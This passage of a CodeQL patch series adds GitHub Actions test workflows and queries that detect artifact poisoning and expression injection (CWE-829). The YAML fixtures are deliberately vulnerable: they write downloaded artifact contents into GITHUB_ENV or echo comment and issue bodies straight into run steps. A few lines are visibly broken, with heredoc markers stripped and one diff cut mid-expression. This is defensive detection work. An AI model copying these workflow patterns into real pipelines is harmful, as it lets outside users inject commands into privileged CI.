| needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml index ca074428ccfa..71f590fbc9c7 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml @@ -18,7 +18,3 @@ jobs: - name: Env Var Injection run: | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV - - - - diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml new file mode 100644 index 000000000000..130668b8515d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" + ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" + + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml new file mode 100644 index 000000000000..7c255e7722d8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + + + + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 907979b88e7c..ab07d0a2f383 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -8,3 +8,5 @@ | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | From ed70ef03078077d943baebd2e4480db9b6830b17 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 15:46:49 +0200 Subject: [PATCH 167/707] Make Artifact poisoning query a path problem --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 16 +- .../security/ArtifactPoisoningQuery.qll | 21 + ql/src/Security/CWE-829/ArtifactPoisoning.ql | 24 +- .../CWE-829/PrivilegedArtifactPoisoning.ql | 27 ++ ql/test/library-tests/test.expected | 448 +----------------- .../CWE-829/ArtifactPoisoning.expected | 52 +- .../PrivilegedArtifactPoisoning.expected | 52 ++ .../CWE-829/PrivilegedArtifactPoisoning.qlref | 2 + 8 files changed, 166 insertions(+), 476 deletions(-) create mode 100644 ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 0fd3f82b2f7f..3988f2190ab2 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -82,22 +82,18 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da } /** - * A downloaded artifact that gets assigned to an env var declaration. - * - uses: actions/download-artifact@v2 - * - run: echo "::set-env name=id::$(; diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index bd9ec090f7f9..6d3910e2ca5c 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -1,9 +1,9 @@ /** * @name Artifact poisoning * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. - * @kind problem + * @kind path-problem * @problem.severity warning - * @precision medium + * @precision high * @security-severity 9.3 * @id actions/artifact-poisoning * @tags actions @@ -13,11 +13,19 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery +import ArtifactPoisoningFlow::PathGraph -from LocalJob job, ArtifactDownloadStep downloadStep, PoisonableStep step +from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where - // Workflow is privileged - job.getWorkflow().isPrivileged() and - // Download step is followed by a step that may be poisoned by the download - downloadStep.getAFollowingStep() = step -select downloadStep, "Potential artifact poisoning." + ArtifactPoisoningFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) +select sink.getNode(), source, sink, + "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, + sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql new file mode 100644 index 000000000000..cd6d5eeb1089 --- /dev/null +++ b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql @@ -0,0 +1,27 @@ +/** + * @name Artifact poisoning + * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. + * @kind path-problem + * @problem.severity error + * @precision high + * @security-severity 9 + * @id actions/privileged-artifact-poisoning + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery +import ArtifactPoisoningFlow::PathGraph + +from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink +where + ArtifactPoisoningFlow::flowPath(source, sink) and + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) +select sink.getNode(), source, sink, + "Potential privileged artifact poisoning in $@, which may be controlled by an external user.", + sink, sink.getNode().toString() diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index aa2ccdcfe9c0..a6be2226b8c3 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1,446 +1,2 @@ -files -| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | -| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -workflows -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/test.yml:1:1:40:53 | on: push | -reusableWorkflows -compositeActions -jobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -localJobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -extJobs -steps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | -runExprs -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -uses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesArgs -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -parentNodes -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| 